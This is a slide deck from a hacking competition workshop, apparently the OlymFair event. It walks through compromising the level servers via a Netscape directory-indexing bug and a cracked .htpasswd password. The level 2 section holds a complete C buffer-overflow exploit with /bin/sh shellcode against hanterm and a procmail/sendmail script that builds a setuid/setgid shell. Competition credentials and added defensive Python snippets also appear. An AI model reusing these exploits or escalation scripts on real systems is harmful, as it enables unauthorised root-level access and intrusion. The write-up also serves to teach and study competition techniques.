1st OlymFair Workshop: Hacking technique
Taeho Oh

Contents
- How to pass level 1
- How to pass level 2
- Why did many hackers consume much time in level 2?
- About level 3
- Conclusion

How to pass level 1 (1)
What to do?
- Execute /cgi-bin/data/idaccess.cgi and get the way to go to level 2

How to pass level 1 (2)
Level 1 servers (three hosts, one per slide below)

How to pass level 1 (3)
- OS : Solaris 8
- Opened TCP ports : 80, 8080

How to pass level 1 (4)
- OS : HPUX 11.0
- Opened TCP ports : 22, 80, 8080

How to pass level 1 (5)
- OS : MS Windows 2000
- Opened TCP ports : 7, 9, 13, 17, 19, 25, 80, 135, 139, 443, 1025, 1026, 1032, 1723, 3389

How to pass level 1 (6)
Attack
- Port 80 : Apache Web Server
- Port 8080 : Netscape Enterprise Server
- The web servers on 80 and 8080 share the same httpd home directory
- Netscape Enterprise Server has a security bug

How to pass level 1 (7)
Netscape Enterprise Server security bug
- I could see the files in a specific directory, as shown on the slide
- You can also use ?wp-ver-info, ?wp-html-rend, ?wp-usr-prop, ?wp-ver-diff, ?wp-verify-link, ?wp-start-ver, ?wp-stop-ver, and ?wp-uncheckout
- I could browse the directories and check whether a file exists

How to pass level 1 (8)
The file list
/
+-- cgi-bin/
|   +-- data/            (can't access this directory)
|   +-- hackme/
|       +-- a
|       +-- a.c
|       +-- show_file.html
|       +-- showfile.cgi
+-- data/
+-- index.html

How to pass level 1 (9)
Read the .htaccess file with showfile.cgi
- bin/data/.htaccess
Read the .htpasswd file (its path is given in .htaccess) with showfile.cgi
- bin/data/.htpasswd

How to pass level 1 (10)
I could crack the encrypted password from .htpasswd with Crack
- id:password = admin:banana
- I could access the /cgi-bin/data directory with this id and password

How to pass level 1 (11)
I could get the way to go to level 2
- This page is the form that executes
- My serial number : KOR
- My password : oD8YEuqYySWogKSQQsOY00zoAjUkxtv7

How to pass level 1 (12)
Netscape Enterprise Server directory indexing vulnerability
- See ?vid=1063

How to pass level 1 (13)
Netscape Enterprise Server directory indexing vulnerability patch information
- The Directory Indexing feature can be turned off via the Administration Interface: select Content Management -> Document Preferences and change Directory Indexing to "none".
- Manually editing the file obj.conf does the same. Search for the following line:
    Service method="(GET|HEAD)" type="magnus-internal/directory" fn="index-common"
  and replace fn="index-common" with fn="send-error".

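As an added example (not part of the original slides), the Python below flags access-log requests that use the wp- commands listed above and applies the obj.conf change from the patch note to a configuration fragment. The log lines and the obj.conf fragment are constructed, and the log is assumed to be in common log format.

```python
# Added example, not from the original slides: flag access-log requests that use
# the Netscape Enterprise Server "wp-" commands named on the slide, and apply the
# obj.conf change from the patch note. Log lines and obj.conf text are constructed.
import re
from urllib.parse import urlsplit

WP_COMMANDS = {  # commands named on the slide
    "wp-ver-info", "wp-html-rend", "wp-usr-prop", "wp-ver-diff",
    "wp-verify-link", "wp-start-ver", "wp-stop-ver", "wp-uncheckout",
}
# common log format: client ident user [time] "METHOD path PROTO" status bytes
CLF_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def wp_command(request_path):
    """Return the wp- command carried in the query string, or None."""
    query = urlsplit(request_path).query
    name = query.split("&", 1)[0]  # the command is the bare query, e.g. /dir/?wp-ver-info
    return name if name in WP_COMMANDS else None

def flag_wp_requests(log_lines):
    """Return (client, path, status, command) for every line using a wp- command."""
    hits = []
    for line in log_lines:
        m = CLF_RE.match(line)
        if not m:
            continue  # not a well-formed CLF line
        client, _method, path, status = m.groups()
        cmd = wp_command(path)
        if cmd:
            hits.append((client, path, int(status), cmd))
    return hits

# The Service line the patch note says to search for in obj.conf.
DIR_SERVICE_RE = re.compile(
    r'^(\s*Service\s+method="\(GET\|HEAD\)"\s+type="magnus-internal/directory"\s+)'
    r'fn="index-common"(.*)$')

def disable_directory_indexing(obj_conf_text):
    """Rewrite fn="index-common" to fn="send-error" on the directory Service line only."""
    out = []
    for line in obj_conf_text.splitlines():
        m = DIR_SERVICE_RE.match(line)
        out.append(f'{m.group(1)}fn="send-error"{m.group(2)}' if m else line)
    return "\n".join(out)

SAMPLE_LOG = [  # constructed log lines
    '10.0.0.5 - - [10/Jul/2000:02:03:11 +0900] "GET /cgi-bin/?wp-ver-info HTTP/1.0" 200 512',
    '10.0.0.5 - - [10/Jul/2000:02:03:12 +0900] "GET /index.html HTTP/1.0" 200 1024',
    '10.0.0.7 - - [10/Jul/2000:02:04:01 +0900] "GET /cgi-bin/hackme/?wp-usr-prop HTTP/1.0" 200 300',
]
```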
How to pass level 2 (1)
What to do?
- Execute /home/forbidden/pass.cgi
  - The owner of this executable is root
  - The group of this executable is wizard
  - The permission is 0510
  - So the wizard gid is needed to execute /home/forbidden/pass.cgi

How to pass level 2 (2)
Level 2 server
- OS : Linux
- Opened TCP ports : 23, 81

How to pass level 2 (3)
Wizard setuid or setgid files
-r-sr-xr-x 1 wizard wizard Jan 4 09:40 /sbin/pwdb_chkpwd
-rwsr-sr-x 1 wizard wizard Mar /sbin/dump
-rwsr-xr-x 1 wizard wizard Apr /sbin/cardctl
-rws--x--x 1 wizard wizard 6148 May /usr/X11R6/bin/Xwrapper
-rws--x--x 1 wizard wizard May /usr/X11R6/bin/hanterm
-rwsr-xr-x 1 wizard wizard Mar /usr/bin/at
-rwsr-xr-x 1 wizard wizard 3208 Mar /usr/bin/disable-paste
-r-sr-x--- 1 wizard wizard Aug /usr/bin/inndstart
-r-sr-x--- 1 wizard wizard Aug /usr/bin/startinnfeed
-r-sr-sr-x 1 wizard wizard Jan 7 07:41 /usr/bin/lpq
-r-sr-sr-x 1 wizard wizard Jan 7 07:41 /usr/bin/lpr
-r-sr-sr-x 1 wizard wizard Jan 7 07:41 /usr/bin/lprm

How to pass level 2 (4)
Wizard setuid or setgid files (Cont.)
-rws--x--x 2 wizard wizard Apr /usr/bin/suidperl
-rws--x--x 2 wizard wizard Apr /usr/bin/sperl
-rwsr-sr-x 1 wizard wizard Apr /usr/bin/procmail
-rwsr-xr-x 1 wizard wizard Apr /usr/bin/rcp
-rwsr-xr-x 1 wizard wizard Apr /usr/bin/rlogin
-rwsr-xr-x 1 wizard wizard 7780 Apr /usr/bin/rsh
-rwxr-sr-x 1 wizard wizard May /usr/lib/emacs/20.3/i386-redhat-linux/mov
-rwsr-sr-x 1 wizard wizard Apr /usr/sbin/sendmail
-rwsr-xr-x 1 wizard wizard Mar /usr/sbin/traceroute
-rwsr-xr-x 1 wizard wizard Jan 8 05:24 /usr/sbin/userhelper
-rwxr-sr-x 1 wizard wizard 3860 Apr /sbin/netreport

How to pass level 2 (5)
Attack process
- Get wizard euid
- Get wizard uid
- Create a wizard uid, gid file
- Get wizard gid
- Execute pass.cgi
- Get level2 shell

How to pass level 2 (6)
level2 shell -> wizard euid
- Exploit the hanterm bug
[I have no ]$ hanterm -hfn `perl -e "print 'A'x240"`
can't load english font AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[I have no ]$ hanterm -hfn `perl -e "print 'A'x250"`
Segmentation fault
[I have no ]$

How to pass level 2 (7)
level2 shell -> wizard euid (Cont.)
- This is a classical buffer overflow bug
- I could get a wizard euid shell with a 260-byte buffer size and a -450 offset

How to pass level 2 (8)-(13)
Exploit code
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define OFFSET -450
#define RET_POSITION 260
#define RANGE 20
#define NOP 0x90

char shellcode[1024]=
"\xeb\x1f"                 /* jmp 0x1f */
"\x5e"                     /* popl %esi */
"\x89\x76\x08"             /* movl %esi,0x8(%esi) */
"\x31\xc0"                 /* xorl %eax,%eax */
"\x88\x46\x07"             /* movb %eax,0x7(%esi) */
"\x89\x46\x0c"             /* movl %eax,0xc(%esi) */
"\xb0\x0b"                 /* movb $0xb,%al */
"\x89\xf3"                 /* movl %esi,%ebx */
"\x8d\x4e\x08"             /* leal 0x8(%esi),%ecx */
"\x8d\x56\x0c"             /* leal 0xc(%esi),%edx */
"\xcd\x80"                 /* int $0x80 */
"\x31\xdb"                 /* xorl %ebx,%ebx */
"\x89\xd8"                 /* movl %ebx,%eax */
"\x40"                     /* inc %eax */
"\xcd\x80"                 /* int $0x80 */
"\xe8\xdc\xff\xff\xff"     /* call -0x24 */
"/bin/sh";                 /* .string "/bin/sh" */

unsigned long get_sp(void)
{
    __asm__("movl %esp,%eax");   /* current stack pointer is returned in %eax */
}

void main(int argc,char **argv)
{
    char buff[RET_POSITION+RANGE+1],*ptr;
    long *addr_ptr,addr;
    unsigned long sp;
    int offset=OFFSET,bsize=RET_POSITION+RANGE+1;
    int i;

    if(argc>1)
        offset=atoi(argv[1]);       /* optional offset override */
    sp=get_sp();
    addr=sp-offset;                 /* guessed return address */
    ptr=buff;
    addr_ptr=(long*)ptr;
    for(i=0;i<bsize;i+=4)           /* fill the buffer with the address */
        *(addr_ptr++)=addr;
    for(i=0;i<bsize-RANGE*2-strlen(shellcode);i++)
        buff[i]=NOP;                /* NOP sled in front of the shellcode */
    ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
    for(i=0;i<strlen(shellcode);i++)
        *(ptr++)=shellcode[i];
    buff[bsize-1]='\0';
    execl("/usr/X11R6/bin/hanterm","hanterm","-hfn",buff,0);
}

How to pass level 2 (14)
wizard euid -> wizard uid
[I have no ]$ cat > a.c
main(){
    setreuid(501,501);
    execl("/bin/sh","sh",0);
}
[I have no ]$ gcc a.c ; ./a.out
]$ whoami
wizard
]$

How to pass level 2 (15)
wizard uid -> create a wizard uid, gid file
- mov is a wizard setgid program, so the output file of mov gets the wizard gid
]$ echo haha > test1
]$ mov test1 test2
]$ ls -l test1 test2
-rw-r--r-- 1 wizard hackers 0 Jul 10 02:03 test1
-rw-r--r-- 1 wizard wizard 5 Jul 10 02:03 test2
]$ cat test2
haha

How to pass level 2 (16)
wizard uid, gid file -> wizard gid
- procmail can execute an arbitrary shell command with the wizard uid and gid when the user can create a file with the wizard uid and gid

How to pass level 2 (17)-(19)
Exploit code
#!/bin/sh
PATH=${PATH}:/usr/lib/emacs/20.3/i386-redhat-linux
export PATH
cat > shh.c << EOF
main(){
    setreuid(501,501);
    setregid(501,501);
    execl("/bin/sh","sh",0);
}
EOF
gcc shh.c -o shh
mov shh shh2
cat > proc << EOF
:0
*
| /bin/chmod 6777 /tmp/shh2
EOF
mov proc /home/wizard/.procmailrc
echo haha | /usr/sbin/sendmail -OQueueDirectory=/tmp wizard
sleep 2
rm -f /home/wizard/.procmailrc
rm -f ./proc
rm -f ./exp
rm -f ./shh.c
rm -f ./shh
echo "rm -f ./shh2" | ./shh2

How to pass level 2 (20)
wizard gid -> execute pass.cgi
Congratulation!! You have passed Level 2.
Your ID : KOR
Initial Pass Time Stamp : :59:30GMT+9
IP for Level 3 is
It is protected by ip filtering.
Please attack and acquire adminstrator's privilege. And then change the index.html under level3 server.
Level 3 Login ID : level3
Level 4 Login Passwd : olymfair3

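As an added example (not from the original slides), the Python below audits an ls -l style listing of setuid/setgid files against an allow-list of expected owner and group pairs, the review a defender would run on a list like the wizard-owned one above before a feature such as the setgid mov program becomes a privilege step. The listing and the allow-list are constructed (the paths reuse names from the slides), and each line is assumed to be complete ls -l output ending in an absolute path.

```python
# Added example, not from the original slides: audit an "ls -l" style listing of
# setuid/setgid files against an allow-list of expected owner:group pairs. The
# listing and the allow-list are constructed (paths reuse names from the slides).
import re

# mode, link count, owner, group, then size/date fields, then an absolute path
LS_RE = re.compile(r'^([-dl][rwxsStT-]{9})\s+\d+\s+(\S+)\s+(\S+)\s+.*?(/\S+)$')

def parse_ls_line(line):
    """Return (mode, owner, group, path) from one ls -l line, or None."""
    m = LS_RE.match(line.strip())
    return m.groups() if m else None

def special_bits(mode):
    """Decode the setuid/setgid bits and world-writability from a symbolic mode."""
    return {"setuid": mode[3] in "sS", "setgid": mode[6] in "sS",
            "world_writable": mode[8] == "w"}

def audit_listing(lines, expected):
    """
    Report privileged files that are not in the allow-list {path: (owner, group)},
    allow-listed files whose owner/group changed, and any that are world-writable.
    Returns a list of (path, finding) in listing order.
    """
    findings = []
    for line in lines:
        parsed = parse_ls_line(line)
        if not parsed:
            continue
        mode, owner, group, path = parsed
        bits = special_bits(mode)
        if not (bits["setuid"] or bits["setgid"]):
            continue  # no special bits, nothing to review
        kind = "setuid" if bits["setuid"] else "setgid"
        if path not in expected:
            findings.append((path, f"unexpected {kind} file owned by {owner}:{group}"))
        elif expected[path] != (owner, group):
            findings.append((path, f"owner/group changed to {owner}:{group}"))
        if bits["world_writable"]:
            findings.append((path, "world-writable"))
    return findings

SAMPLE_LISTING = """
-rwsr-xr-x 1 root root 32768 Mar 1 2000 /usr/bin/at
-rwxr-sr-x 1 wizard wizard 3860 Apr 3 2000 /usr/lib/emacs/20.3/i386-redhat-linux/mov
-rwsr-sr-x 1 wizard wizard 448000 Apr 3 2000 /usr/sbin/sendmail
-rwsrwsrwx 1 wizard wizard 6148 May 5 2000 /tmp/shh2
-rw-r--r-- 1 wizard hackers 0 Jul 10 02:03 /tmp/test1
""".strip().splitlines()
EXPECTED = {"/usr/bin/at": ("root", "root"), "/usr/sbin/sendmail": ("root", "root")}
```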
Why did many hackers consume much time in level 2? (1)
Almost all hackers tried to find a security bug
- However, level 2 can be cleared not with a bug but with a feature (except for the hanterm bug)

Why did many hackers consume much time in level 2? (2)
/sbin/dump has a buffer overflow bug, but no exploit has been released
- Many hackers tried to exploit this program. However, exploitation is impossible because the main function does not return but calls exit

Why did many hackers consume much time in level 2? (3)
The /usr/bin/lprm exploit code generates a segmentation fault message
- The segmentation fault message is not generated by /usr/bin/lprm; it is generated by the /usr/bin/lprm exploit code itself. It's a bug in the exploit code.

About level 3
I consumed much time, so I had no time to attack level 3
I tried to scan the level 3 server
- However, I couldn't find any opened TCP port
- I didn't try to attack level 3 from then on; it seemed it would take much time

Conclusion
It was an interesting hacking competition